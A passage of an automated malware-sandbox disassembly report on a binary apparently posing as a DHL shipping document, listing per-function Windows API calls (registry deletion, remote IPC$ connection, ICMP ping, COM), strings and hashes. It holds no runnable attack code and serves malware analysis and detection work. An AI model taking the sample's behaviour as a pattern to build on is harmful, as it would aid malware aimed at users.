VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00ACDCBC

Strings

04090000, xrefs: 00ACDCF2
DefaultLangCodepage, xrefs: 00ACDD1F
\VarFileInfo\Translation, xrefs: 00ACDCB4
%u.%u.%u.%u, xrefs: 00ACDD9A
StringFileInfo\, xrefs: 00ACDC8F

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
API String ID: 1939486746-1459072770
Opcode ID: ed75fe13d1234280795e74da7f98c6106122874663c07a9823b42545b2e5466d
Instruction ID: b11294fb071c964c3b2e87909f183b067f2f2e426ebb6f3894f1c86d7abb79ea
Opcode Fuzzy Hash: ed75fe13d1234280795e74da7f98c6106122874663c07a9823b42545b2e5466d
Instruction Fuzzy Hash: 7E411F329402187ADB11B7B5DE43FBF77BCEF41720F1040AAF905A6192EB749A01A7A5

Function 00AECC34 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 104registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00AECC64
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 00AECC8D
FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00AECD48

Part of subcall function 00AECC34: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 00AECCAA
Part of subcall function 00AECC34: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 00AECCBD
Part of subcall function 00AECC34: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00AECCCF
Part of subcall function 00AECC34: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00AECD05
Part of subcall function 00AECC34: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00AECD28

RegDeleteKeyW.ADVAPI32(?,?), ref: 00AECCF3

Strings

RegDeleteKeyExW, xrefs: 00AECCC9
advapi32.dll, xrefs: 00AECCB8

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2734957052-4033151799
Opcode ID: 3f14ce1f2b6eeb6751ef2846405e748f0337628fe5e9dab0de2c54a557477179
Instruction ID: 4418f84a49f841cb6b4929a7d6bbe0acca7cabc5076781d59a9eb112aaa2bb74
Opcode Fuzzy Hash: 3f14ce1f2b6eeb6751ef2846405e748f0337628fe5e9dab0de2c54a557477179
Instruction Fuzzy Hash: C9316C7190112DBBDB20CB96DD88EFFBB7CEF55760F000165A906E3250DA349A47DAA0

Function 00ACE9FC Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 71COMMON

Download Yara Rule

APIs

Part of subcall function 00A69CB3: _wcslen.LIBCMT ref: 00A69CBD

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00ACEA5D
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00ACEA73
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00ACEA84
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00ACEA96
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00ACEAA7

Strings

play PlayMe wait, xrefs: 00ACEA91
status PlayMe mode, xrefs: 00ACEA58
open , xrefs: 00ACEA0C
alias PlayMe, xrefs: 00ACEA36
close PlayMe, xrefs: 00ACEA6E, 00ACEA9B
play PlayMe, xrefs: 00ACEAA2

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: SendString$_wcslen
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 2420728520-1007645807
Opcode ID: 7c3f0c41dc77863304eee1b42ba913b626267d632507619e6dc229f87176bd0e
Instruction ID: 2abec9106aee9bc989d0c9d79415196c46d0a248b3c58b3ca1b107d100874b0c
Opcode Fuzzy Hash: 7c3f0c41dc77863304eee1b42ba913b626267d632507619e6dc229f87176bd0e
Instruction Fuzzy Hash: 87118671A902697DD720E7A1ED4AEFF6BBCEBD6B40F4004697405A20E1EE701D45C9B0

Function 00AC5CC6 Relevance: 18.2, APIs: 12, Instructions: 173COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 00AC5CE2
GetWindowRect.USER32(00000000,?), ref: 00AC5CFB
MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 00AC5D59
GetDlgItem.USER32(?,00000002), ref: 00AC5D69
GetWindowRect.USER32(00000000,?), ref: 00AC5D7B
MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00AC5DCF
GetDlgItem.USER32(?,000003E9), ref: 00AC5DDD
GetWindowRect.USER32(00000000,?), ref: 00AC5DEF
MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00AC5E31
GetDlgItem.USER32(?,000003EA), ref: 00AC5E44
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00AC5E5A
InvalidateRect.USER32(?,00000000,00000001), ref: 00AC5E67

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: 9f8a8d89ae674276d700103bbd94022002388fc609d39bdee592fbd1153f7bae
Instruction ID: fc9ca46af783a376447c814c93c2e57752640dbaa3a6b3281baab566e9b0e014
Opcode Fuzzy Hash: 9f8a8d89ae674276d700103bbd94022002388fc609d39bdee592fbd1153f7bae
Instruction Fuzzy Hash: 90511D70E00609AFDF18CFA9DD89EAEBBB5EF48310F158129F516E6290D770AE41CB50

Function 00A78BCD Relevance: 18.2, APIs: 12, Instructions: 168timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00A78F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00A78BE8,?,00000000,?,?,?,?,00A78BBA,00000000,?), ref: 00A78FC5

DestroyWindow.USER32(?), ref: 00A78C81
KillTimer.USER32(00000000,?,?,?,?,00A78BBA,00000000,?), ref: 00A78D1B
DestroyAcceleratorTable.USER32(00000000), ref: 00AB6973
ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00A78BBA,00000000,?), ref: 00AB69A1
ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00A78BBA,00000000,?), ref: 00AB69B8
ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00A78BBA,00000000), ref: 00AB69D4
DeleteObject.GDI32(00000000), ref: 00AB69E6

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 641708696-0
Opcode ID: 2b12f885e2d689208e0d4ca0c648e5646624d3fc56633bd86f0a9c8ce27838f4
Instruction ID: fae9afee1edc095bc00d26d4e2e25bc5d16a46272b5f8ba0eefbc09972ab6d6c
Opcode Fuzzy Hash: 2b12f885e2d689208e0d4ca0c648e5646624d3fc56633bd86f0a9c8ce27838f4
Instruction Fuzzy Hash: BC618C31142604DFCB32DF59CE58B69B7F5FB40322F24C92CE04697560CB39A986CB90

Function 00A79838 Relevance: 18.1, APIs: 12, Instructions: 137COMMON

Download Yara Rule

APIs

Part of subcall function 00A79944: GetWindowLongW.USER32(?,000000EB), ref: 00A79952

GetSysColor.USER32(0000000F), ref: 00A79862

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: a1bdc93e7c0ac8e288763b7ac7f62ad2e14e7d3f1309e289bdb73e837a30d7db
Instruction ID: f36c8770fd514bd97e3e89a0f9ae0915e31c06d5c71e8199ca91f42502739ec9
Opcode Fuzzy Hash: a1bdc93e7c0ac8e288763b7ac7f62ad2e14e7d3f1309e289bdb73e837a30d7db
Instruction Fuzzy Hash: 7D41B2321046449FDB209FB99C84BBA3BA9AB47331F14C656F9A6872E2C7719C42DB11

Function 00AF50D4 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 162windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00002001,00000000,00000000), ref: 00AF5186
ShowWindow.USER32(?,00000000), ref: 00AF51C7
ShowWindow.USER32(?,00000005,?,00000000), ref: 00AF51CD
SetFocus.USER32(?,?,00000005,?,00000000), ref: 00AF51D1

Part of subcall function 00AF6FBA: DeleteObject.GDI32(00000000), ref: 00AF6FE6

GetWindowLongW.USER32(?,000000F0), ref: 00AF520D
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00AF521A
InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00AF524D
SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 00AF5287
SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 00AF5296

Strings

@U=u, xrefs: 00AF5186

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
String ID: @U=u
API String ID: 3210457359-2594219639
Opcode ID: 205210811185de1aa32fbedd40363c7c339d539a7618aa873e0f5005ae04dea5
Instruction ID: 9e86b67800709bce4d9e1fb4523ac2961a5d5aad03e05306fc998bb6c0cc6e17
Opcode Fuzzy Hash: 205210811185de1aa32fbedd40363c7c339d539a7618aa873e0f5005ae04dea5
Instruction Fuzzy Hash: D0516D30E40A0CBEEF24AFB9CD45BF93B65AF05361F148212F715962E0C775A980DB44

Function 00A78B06 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 155windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 00AB6890
ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 00AB68A9
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00AB68B9
ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 00AB68D1
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00AB68F2
DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00A78874,00000000,00000000,00000000,000000FF,00000000), ref: 00AB6901
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00AB691E
DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00A78874,00000000,00000000,00000000,000000FF,00000000), ref: 00AB692D

Strings

@U=u, xrefs: 00AB68F2, 00AB691E

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend
String ID: @U=u
API String ID: 1268354404-2594219639
Opcode ID: a777896c7836c37c31cb39ee7d60db5c9141071b5bbd9ac60b9655e4f58d75cf
Instruction ID: 02c3c980c958aa8abcb4d1d6e0ee72187c6ff771e035225db40a77e94f2261ab
Opcode Fuzzy Hash: a777896c7836c37c31cb39ee7d60db5c9141071b5bbd9ac60b9655e4f58d75cf
Instruction Fuzzy Hash: 83519D70640209EFDB20CF65CC55FAE7BB9FB88760F108518F94A972A0DB74E951DB50

Function 00AC96E2 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 137windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,?,?,00AAF7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?), ref: 00AC9717
LoadStringW.USER32(00000000,?,00AAF7F8,00000001), ref: 00AC9720

Part of subcall function 00A69CB3: _wcslen.LIBCMT ref: 00A69CBD

GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,00AAF7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?,00000000), ref: 00AC9742
LoadStringW.USER32(00000000,?,00AAF7F8,00000001), ref: 00AC9745
MessageBoxW.USER32(00000000,00000000,?,00011010), ref: 00AC9866

Strings

^ ERROR, xrefs: 00AC97FB
Line %d:, xrefs: 00AC97A0
%s (%d) : ==> %s: %s %s, xrefs: 00AC984A
Error: , xrefs: 00AC981D
Line %d (File "%s"):, xrefs: 00AC978F

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wcslen
String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
API String ID: 747408836-2268648507
Opcode ID: 965bcdd17204c982d73fb80f9ca2a920559fda6c3a9de2ab45bfc6c71f8e5358
Instruction ID: 27cd6766bee6b5e1899443f902b25ef29f036dc0e51823c8863da18503b34d61
Opcode Fuzzy Hash: 965bcdd17204c982d73fb80f9ca2a920559fda6c3a9de2ab45bfc6c71f8e5358
Instruction Fuzzy Hash: AC412872800219AADF04EBE0DF86EEFB778AF55340F210069F60576192EB356F49DB61

Function 00AC06DE Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 127registryshareCOMMON

Download Yara Rule

APIs

Part of subcall function 00A66B57: _wcslen.LIBCMT ref: 00A66B6A

WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00AC07A2
RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00AC07BE
RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00AC07DA
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00AC0804
CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 00AC082C
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00AC0837
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00AC083C

Strings

SOFTWARE\Classes\, xrefs: 00AC070E
\CLSID, xrefs: 00AC0724
\IPC$, xrefs: 00AC0784

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
String ID: SOFTWARE\Classes\$\CLSID$\IPC$
API String ID: 323675364-22481851
Opcode ID: 59abb84271318670be2dfca817e942cb2f53aaf4a95a8f949fb69381b63be0fe
Instruction ID: 504215ef2ebe776f3efc3206e8a553ff8b2e56c4cbeb5180fc4564ecfea00fa3
Opcode Fuzzy Hash: 59abb84271318670be2dfca817e942cb2f53aaf4a95a8f949fb69381b63be0fe
Instruction Fuzzy Hash: 76412472C10228EBDF25EBA4DD85DEEB7B8BF14350F154129E905A7160EB30AE05CBA0

Function 00AE3C30 Relevance: 16.8, APIs: 11, Instructions: 344fileCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00AE3C5C
CoInitialize.OLE32(00000000), ref: 00AE3C8A
CoUninitialize.OLE32 ref: 00AE3C94
_wcslen.LIBCMT ref: 00AE3D2D
GetRunningObjectTable.OLE32(00000000,?), ref: 00AE3DB1
SetErrorMode.KERNEL32(00000001,00000029), ref: 00AE3ED5
CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 00AE3F0E
CoGetObject.OLE32(?,00000000,00AFFB98,?), ref: 00AE3F2D
SetErrorMode.KERNEL32(00000000), ref: 00AE3F40
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00AE3FC4
VariantClear.OLEAUT32(?), ref: 00AE3FD8

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
String ID:
API String ID: 429561992-0
Opcode ID: a5543e316542f6dd801dfa7289036fb905b5b172a94f7661de9b6fd686011548
Instruction ID: 425934487592df62e466450fea5577b5570f6e14bc3b2d40bc3677cf27056fc1
Opcode Fuzzy Hash: a5543e316542f6dd801dfa7289036fb905b5b172a94f7661de9b6fd686011548
Instruction Fuzzy Hash: B6C14572608245AFCB00DF6AC98892BB7F9FF89744F10495DF98A9B210D731EE05CB52

Function 00AD7A96 Relevance: 16.8, APIs: 11, Instructions: 298comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00AD7AF3
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00AD7B8F
SHGetDesktopFolder.SHELL32(?), ref: 00AD7BA3
CoCreateInstance.OLE32(00AFFD08,00000000,00000001,00B26E6C,?), ref: 00AD7BEF
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00AD7C74
CoTaskMemFree.OLE32(?,?), ref: 00AD7CCC
SHBrowseForFolderW.SHELL32(?), ref: 00AD7D57
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00AD7D7A
CoTaskMemFree.OLE32(00000000), ref: 00AD7D81
CoTaskMemFree.OLE32(00000000), ref: 00AD7DD6
CoUninitialize.OLE32 ref: 00AD7DDC

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
String ID:
API String ID: 2762341140-0
Opcode ID: 44752abe4d4d61d45bbea6ff7149ebfe65b46d689511a8a97b203b5307da69e8
Instruction ID: 704344b69f14f26fcbd93e290c717902b7d1c5dc62d06c4f1c6825b851568929
Opcode Fuzzy Hash: 44752abe4d4d61d45bbea6ff7149ebfe65b46d689511a8a97b203b5307da69e8
Instruction Fuzzy Hash: AFC10975A04119AFCB14DFA4C988DAEBBF9FF48314B148499E81ADB361D730EE45CB90

Function 00ABFA88 Relevance: 16.6, APIs: 11, Instructions: 122memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00ABFAAF
SafeArrayAllocData.OLEAUT32(?), ref: 00ABFB08
VariantInit.OLEAUT32(?), ref: 00ABFB1A
SafeArrayAccessData.OLEAUT32(?,?), ref: 00ABFB3A
VariantCopy.OLEAUT32(?,?), ref: 00ABFB8D
SafeArrayUnaccessData.OLEAUT32(?), ref: 00ABFBA1
VariantClear.OLEAUT32(?), ref: 00ABFBB6
SafeArrayDestroyData.OLEAUT32(?), ref: 00ABFBC3
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00ABFBCC
VariantClear.OLEAUT32(?), ref: 00ABFBDE
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00ABFBE9

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: e46f39bc22b81624fad98e2bda61140be410af3e05fc850206a1ed9937af6bb5
Instruction ID: 67d124a6abdcf3ce548dc3676e37126cceb92b3f6b1396ce1e312e68f24c4548
Opcode Fuzzy Hash: e46f39bc22b81624fad98e2bda61140be410af3e05fc850206a1ed9937af6bb5
Instruction Fuzzy Hash: 1A417235A00219DFCB04DFA9CD589FDBBB9FF08355F048469E856A7262CB30A946CF90

Function 00AE055B Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 207networkfileCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 00AE05BC
inet_addr.WSOCK32(?), ref: 00AE061C
gethostbyname.WSOCK32(?), ref: 00AE0628
IcmpCreateFile.IPHLPAPI ref: 00AE0636
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00AE06C6
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00AE06E5
IcmpCloseHandle.IPHLPAPI(?), ref: 00AE07B9
WSACleanup.WSOCK32 ref: 00AE07BF

Strings

Ping, xrefs: 00AE0676

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

